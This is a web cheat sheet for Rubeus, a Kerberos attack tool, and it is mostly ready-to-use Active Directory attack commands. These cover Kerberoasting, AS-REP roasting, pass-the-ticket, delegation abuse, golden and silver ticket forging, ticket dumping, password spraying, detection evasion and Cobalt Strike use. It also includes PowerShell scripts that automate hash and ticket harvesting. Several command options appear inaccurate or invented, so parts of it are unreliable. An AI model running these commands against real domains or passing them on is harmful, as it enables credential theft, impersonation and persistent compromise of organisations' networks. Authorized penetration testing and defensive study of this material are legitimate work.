1337skills.com

Appearance

Rubeus Kerberos Interaction Tool Cheat Sheet

Overview

Rubeus is a C# toolset for raw Kerberos interaction and abuses. It's designed for attacking Kerberos implementations and includes functionality for ticket requests, renewals, and various Kerberos-based attacks. Rubeus is particularly useful for Active Directory penetration testing and red team operations.

⚠️ Warning: This tool is intended for authorized penetration testing and security assessments only. Ensure you have proper authorization before using in any environment.

Installation

Pre-compiled Binary

powershell
# Download from GitHub releases
Invoke-WebRequest -Uri "https://github.com/GhostPack/Rubeus/releases/download/v2.2.3/Rubeus.exe" -OutFile "Rubeus.exe"

# Verify download
Get-FileHash Rubeus.exe -Algorithm SHA256

Compile from Source

powershell
# Clone repository
git clone https://github.com/GhostPack/Rubeus.git
cd Rubeus

# Compile with Visual Studio or MSBuild
msbuild Rubeus.sln /p:Configuration=Release /p:Platform="Any CPU"

# Output will be in Rubeus/bin/Release/

Alternative Download Methods

powershell
# Using PowerShell
$url = "https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe"
$output = "C:\Tools\Rubeus.exe"
Invoke-WebRequest -Uri $url -OutFile $output

# Using curl (if available)
curl -L -o Rubeus.exe https://github.com/GhostPack/Rubeus/releases/latest/download/Rubeus.exe

Basic Usage

Command Structure

cmd
# Basic syntax
Rubeus.exe [command] [options]

# Get help
Rubeus.exe help

# Get help for specific command
Rubeus.exe [command] /help

Available Commands

CommandDescription
asktgtRequest a TGT (Ticket Granting Ticket)
asktgsRequest a TGS (Ticket Granting Service)
askticketRequest a ticket for a specific service
renewRenew a ticket
s4uPerform S4U (Service for User) attacks
pttPass-the-ticket attacks
purgePurge tickets from memory
describeDescribe ticket contents
klistList current tickets
dumpDump tickets from memory
triageTriage tickets
monitorMonitor for new tickets
harvestHarvest tickets
bruteBrute force passwords
kerberoastKerberoasting attacks
asreproastAS-REP roasting attacks

Ticket Requests and Management

Request TGT (Ticket Granting Ticket)

cmd
# Request TGT with password
Rubeus.exe asktgt /user:username /password:password /domain:domain.com

# Request TGT with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com

# Request TGT with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com

# Request TGT for specific domain controller
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /dc:dc01.domain.com

Request TGS (Ticket Granting Service)

cmd
# Request TGS for specific service
Rubeus.exe asktgs /ticket:base64ticket /service:cifs/server.domain.com

# Request TGS with current user context
Rubeus.exe asktgs /service:cifs/server.domain.com

# Request TGS for multiple services
Rubeus.exe asktgs /service:cifs/server.domain.com,http/server.domain.com

# Request TGS with specific encryption
Rubeus.exe asktgs /service:cifs/server.domain.com /enctype:aes256

Ticket Management

cmd
# List current tickets
Rubeus.exe klist

# Describe ticket contents
Rubeus.exe describe /ticket:base64ticket

# Purge all tickets
Rubeus.exe purge

# Purge specific ticket
Rubeus.exe purge /luid:0x12345

# Dump tickets from memory
Rubeus.exe dump

# Dump tickets for specific user
Rubeus.exe dump /user:username

Kerberoasting Attacks

Basic Kerberoasting

cmd
# Kerberoast all SPNs
Rubeus.exe kerberoast

# Kerberoast specific user
Rubeus.exe kerberoast /user:serviceaccount

# Kerberoast with specific encryption
Rubeus.exe kerberoast /enctype:rc4

# Kerberoast and save to file
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt

Advanced Kerberoasting

cmd
# Kerberoast with LDAP filter
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*))"

# Kerberoast specific domain
Rubeus.exe kerberoast /domain:target.domain.com

# Kerberoast with specific domain controller
Rubeus.exe kerberoast /dc:dc01.domain.com

# Kerberoast with enterprise principals
Rubeus.exe kerberoast /enterprise

Targeted Kerberoasting

cmd
# Kerberoast specific SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433

# Kerberoast multiple SPNs
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.domain.com:1433,HTTP/web01.domain.com

# Kerberoast with password policy bypass
Rubeus.exe kerberoast /pwdsetafter:01/01/2020

# Kerberoast high-value targets
Rubeus.exe kerberoast /ldapfilter:"(&(objectClass=user)(servicePrincipalName=*)(adminCount=1))"

AS-REP Roasting Attacks

Basic AS-REP Roasting

cmd
# AS-REP roast all users
Rubeus.exe asreproast

# AS-REP roast specific user
Rubeus.exe asreproast /user:username

# AS-REP roast and save to file
Rubeus.exe asreproast /outfile:asrep_hashes.txt

# AS-REP roast with specific format
Rubeus.exe asreproast /format:hashcat

Advanced AS-REP Roasting

cmd
# AS-REP roast with LDAP filter
Rubeus.exe asreproast /ldapfilter:"(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"

# AS-REP roast specific domain
Rubeus.exe asreproast /domain:target.domain.com

# AS-REP roast with domain controller
Rubeus.exe asreproast /dc:dc01.domain.com

# AS-REP roast with credentials
Rubeus.exe asreproast /user:username /password:password /domain:domain.com

Pass-the-Ticket (PTT) Attacks

Basic Pass-the-Ticket

cmd
# Pass-the-ticket with base64 ticket
Rubeus.exe ptt /ticket:base64ticket

# Pass-the-ticket from file
Rubeus.exe ptt /ticket:ticket.kirbi

# Pass-the-ticket to specific LUID
Rubeus.exe ptt /ticket:base64ticket /luid:0x12345

# Pass-the-ticket and create process
Rubeus.exe ptt /ticket:base64ticket /createnetonly:C:\Windows\System32\cmd.exe

Advanced PTT Techniques

cmd
# Pass multiple tickets
Rubeus.exe ptt /ticket:ticket1.kirbi,ticket2.kirbi

# Pass-the-ticket with service validation
Rubeus.exe ptt /ticket:base64ticket /service:cifs/server.domain.com

# Pass-the-ticket and inject into process
Rubeus.exe ptt /ticket:base64ticket /process:explorer.exe

S4U (Service for User) Attacks

S4U2Self Attacks

cmd
# S4U2Self attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

# S4U2Self with AES key
Rubeus.exe s4u /user:serviceaccount /aes256:aeskey /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

# S4U2Self with ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com

S4U2Proxy Attacks

cmd
# S4U2Proxy attack
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http

# S4U2Proxy with multiple services
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http,ldap

# S4U2Proxy with existing ticket
Rubeus.exe s4u /ticket:base64ticket /impersonateuser:targetuser /msdsspn:cifs/server.domain.com /altservice:http

Constrained Delegation Abuse

cmd
# Abuse constrained delegation
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com

# Abuse with protocol transition
Rubeus.exe s4u /user:serviceaccount /rc4:ntlmhash /impersonateuser:administrator /msdsspn:cifs/dc01.domain.com /altservice:ldap /ptt

# Abuse with multiple hops
Rubeus.exe s4u /user:serviceaccount1 /rc4:hash1 /impersonateuser:administrator /msdsspn:cifs/server1.domain.com /altservice:cifs/server2.domain.com

Golden and Silver Ticket Attacks

Golden Ticket Creation

cmd
# Create golden ticket
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519

# Create golden ticket with AES
Rubeus.exe golden /aes256:krbtgtaeskey /user:administrator /domain:domain.com /sid:S-1-5-21-...

# Create golden ticket with specific groups
Rubeus.exe golden /rc4:krbtgthash /user:administrator /domain:domain.com /sid:S-1-5-21-... /groups:512,513,518,519,520

Silver Ticket Creation

cmd
# Create silver ticket
Rubeus.exe silver /rc4:servicehash /user:administrator /service:cifs/server.domain.com /domain:domain.com

# Create silver ticket with AES
Rubeus.exe silver /aes256:serviceaeskey /user:administrator /service:cifs/server.domain.com /domain:domain.com

# Create silver ticket for specific service
Rubeus.exe silver /rc4:servicehash /user:administrator /service:MSSQLSvc/sql01.domain.com:1433 /domain:domain.com

Ticket Harvesting and Monitoring

Ticket Harvesting

cmd
# Harvest tickets from all sessions
Rubeus.exe harvest

# Harvest tickets with monitoring
Rubeus.exe harvest /interval:30

# Harvest tickets for specific user
Rubeus.exe harvest /user:administrator

# Harvest and save to file
Rubeus.exe harvest /outfile:harvested_tickets.txt

Ticket Monitoring

cmd
# Monitor for new tickets
Rubeus.exe monitor

# Monitor with specific interval
Rubeus.exe monitor /interval:60

# Monitor for specific users
Rubeus.exe monitor /filteruser:administrator,serviceaccount

# Monitor and save to file
Rubeus.exe monitor /outfile:monitored_tickets.txt

Ticket Triage

cmd
# Triage all tickets
Rubeus.exe triage

# Triage tickets for specific user
Rubeus.exe triage /user:administrator

# Triage with LUID filter
Rubeus.exe triage /luid:0x12345

# Triage and show service tickets only
Rubeus.exe triage /service

Password Attacks

Password Spraying

cmd
# Password spray with single password
Rubeus.exe brute /password:Password123 /noticket

# Password spray with password list
Rubeus.exe brute /passwords:passwords.txt /noticket

# Password spray specific users
Rubeus.exe brute /users:users.txt /password:Password123 /noticket

# Password spray with domain
Rubeus.exe brute /password:Password123 /domain:domain.com /noticket

Credential Validation

cmd
# Validate credentials
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /getcredentials

# Validate with NTLM hash
Rubeus.exe asktgt /user:username /rc4:ntlmhash /domain:domain.com /getcredentials

# Validate with AES key
Rubeus.exe asktgt /user:username /aes256:aeskey /domain:domain.com /getcredentials

Advanced Techniques

Cross-Domain Attacks

cmd
# Request inter-realm TGT
Rubeus.exe asktgt /user:username /password:password /domain:child.domain.com /dc:dc01.child.domain.com

# Request cross-domain TGS
Rubeus.exe asktgs /service:krbtgt/parent.domain.com /domain:child.domain.com /ticket:base64ticket

# Golden ticket for child domain
Rubeus.exe golden /rc4:childhash /user:administrator /domain:child.domain.com /sid:S-1-5-21-... /sids:S-1-5-21-...-519

Unconstrained Delegation Abuse

cmd
# Monitor for delegation tickets
Rubeus.exe monitor /targetuser:DC01$ /interval:5

# Extract TGT from delegation
Rubeus.exe dump /service:krbtgt /nowrap

# Use extracted TGT
Rubeus.exe ptt /ticket:extractedtgt

Resource-Based Constrained Delegation

cmd
# Abuse RBCD
Rubeus.exe s4u /user:controlledaccount /rc4:hash /impersonateuser:administrator /msdsspn:host/target.domain.com /altservice:cifs,http,ldap /ptt

# RBCD with computer account
Rubeus.exe s4u /user:COMPUTER$ /rc4:computerhash /impersonateuser:administrator /msdsspn:host/target.domain.com /ptt

Evasion Techniques

OPSEC Considerations

cmd
# Use specific encryption types
Rubeus.exe kerberoast /enctype:aes256

# Avoid detection with delays
Rubeus.exe kerberoast /delay:5000

# Use specific domain controllers
Rubeus.exe kerberoast /dc:dc02.domain.com

# Limit requests
Rubeus.exe kerberoast /spn:specific/service.domain.com

Stealth Operations

cmd
# Request tickets without caching
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /ptt /luid:0x0

# Use alternative service names
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:user /msdsspn:cifs/server.domain.com /altservice:host

# Minimize ticket lifetime
Rubeus.exe asktgt /user:username /password:password /domain:domain.com /endtime:01/01/2024

Integration with Other Tools

Mimikatz Integration

cmd
# Export tickets for Mimikatz
Rubeus.exe dump /outfile:tickets.kirbi

# Use in Mimikatz
mimikatz # kerberos::ptc tickets.kirbi

Impacket Integration

bash
# Convert Rubeus tickets for Impacket
# Use ticket with impacket tools
export KRB5CCNAME=ticket.ccache
python3 psexec.py -k -no-pass domain.com/administrator@target.domain.com

Cobalt Strike Integration 

# Cobalt Strike beacon commands
beacon> execute-assembly Rubeus.exe kerberoast
beacon> execute-assembly Rubeus.exe asreproast
beacon> execute-assembly Rubeus.exe dump

Automation Scripts

Comprehensive Kerberos Assessment

powershell
# Comprehensive Kerberos assessment script
param(
    [string]$Domain = $env:USERDOMAIN,
    [string]$OutputPath = "C:\Temp\KerberosAssessment"
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Starting comprehensive Kerberos assessment for $Domain"

# Kerberoasting
Write-Host "[+] Performing Kerberoasting..."
& Rubeus.exe kerberoast /outfile:"$OutputPath\kerberoast.txt" /domain:$Domain

# AS-REP Roasting
Write-Host "[+] Performing AS-REP Roasting..."
& Rubeus.exe asreproast /outfile:"$OutputPath\asreproast.txt" /domain:$Domain

# Ticket triage
Write-Host "[+] Triaging current tickets..."
& Rubeus.exe triage | Out-File "$OutputPath\ticket_triage.txt"

# Dump tickets
Write-Host "[+] Dumping tickets..."
& Rubeus.exe dump | Out-File "$OutputPath\ticket_dump.txt"

Write-Host "[+] Assessment complete. Results saved to $OutputPath"

Automated Ticket Harvesting

powershell
# Automated ticket harvesting script
param(
    [int]$Interval = 300,  # 5 minutes
    [string]$OutputPath = "C:\Temp\TicketHarvest",
    [int]$Duration = 3600  # 1 hour
)

New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

$endTime = (Get-Date).AddSeconds($Duration)
$iteration = 1

Write-Host "[+] Starting ticket harvesting for $Duration seconds"

while ((Get-Date) -lt $endTime) {
    $timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
    $outputFile = "$OutputPath\harvest_$iteration`_$timestamp.txt"
    
    Write-Host "[+] Iteration $iteration - Harvesting tickets..."
    & Rubeus.exe harvest | Out-File $outputFile
    
    Write-Host "[+] Tickets saved to $outputFile"
    
    if ((Get-Date) -lt $endTime) {
        Write-Host "[+] Waiting $Interval seconds..."
        Start-Sleep -Seconds $Interval
    }
    
    $iteration++
}

Write-Host "[+] Ticket harvesting complete"

Domain Reconnaissance Script

powershell
# Domain reconnaissance with Rubeus
param(
    [string]$Domain,
    [string]$Username,
    [string]$Password,
    [string]$OutputPath = "C:\Temp\DomainRecon"
)

New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Starting domain reconnaissance for $Domain"

# Test credentials
Write-Host "[+] Testing credentials..."
$credTest = & Rubeus.exe asktgt /user:$Username /password:$Password /domain:$Domain /getcredentials
$credTest | Out-File "$OutputPath\credential_test.txt"

if ($credTest -match "TGT request successful") {
    Write-Host "[+] Credentials valid, continuing reconnaissance..."
    
    # Kerberoasting with credentials
    Write-Host "[+] Kerberoasting with credentials..."
    & Rubeus.exe kerberoast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\kerberoast_creds.txt"
    
    # AS-REP Roasting with credentials
    Write-Host "[+] AS-REP Roasting with credentials..."
    & Rubeus.exe asreproast /creduser:$Username /credpassword:$Password /domain:$Domain /outfile:"$OutputPath\asreproast_creds.txt"
    
    Write-Host "[+] Reconnaissance complete"
} else {
    Write-Host "[-] Credentials invalid, stopping reconnaissance"
}

Troubleshooting

Common Issues

cmd
# Clock skew issues
w32tm /resync

# Network connectivity
nslookup domain.com
telnet dc01.domain.com 88

# Kerberos configuration
klist purge
klist

# DNS resolution
nslookup _kerberos._tcp.domain.com

Debug Mode

cmd
# Enable Kerberos logging
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters" /v LogLevel /t REG_DWORD /d 1

# View Kerberos events
Get-WinEvent -LogName System | Where-Object {$_.Id -eq 4768 -or $_.Id -eq 4769}

# Check ticket cache
klist tickets

Error Resolution

cmd
# KDC_ERR_PREAUTH_FAILED
# Check username/password, account lockout

# KDC_ERR_C_PRINCIPAL_UNKNOWN
# Verify username format and domain

# KDC_ERR_S_PRINCIPAL_UNKNOWN
# Check SPN existence and format

# KRB_AP_ERR_SKEW
# Synchronize time with domain controller

Best Practices

Operational Security

  1. Use legitimate accounts: Avoid suspicious service accounts when possible
  2. Limit requests: Don't flood the domain controller with requests
  3. Time synchronization: Ensure proper time sync to avoid clock skew
  4. Clean up: Remove injected tickets after operations
  5. Monitor logs: Be aware of generated security events

Attack Strategy

cmd
# Start with reconnaissance
Rubeus.exe triage
Rubeus.exe klist

# Identify targets
Rubeus.exe kerberoast /stats
Rubeus.exe asreproast /stats

# Execute targeted attacks
Rubeus.exe kerberoast /user:specific_target
Rubeus.exe s4u /user:service /rc4:hash /impersonateuser:admin

# Maintain persistence
Rubeus.exe golden /rc4:krbtgt_hash /user:admin /domain:domain.com

Resources

This cheat sheet provides a comprehensive reference for using Rubeus. Always ensure you have proper authorization before conducting Active Directory security assessments.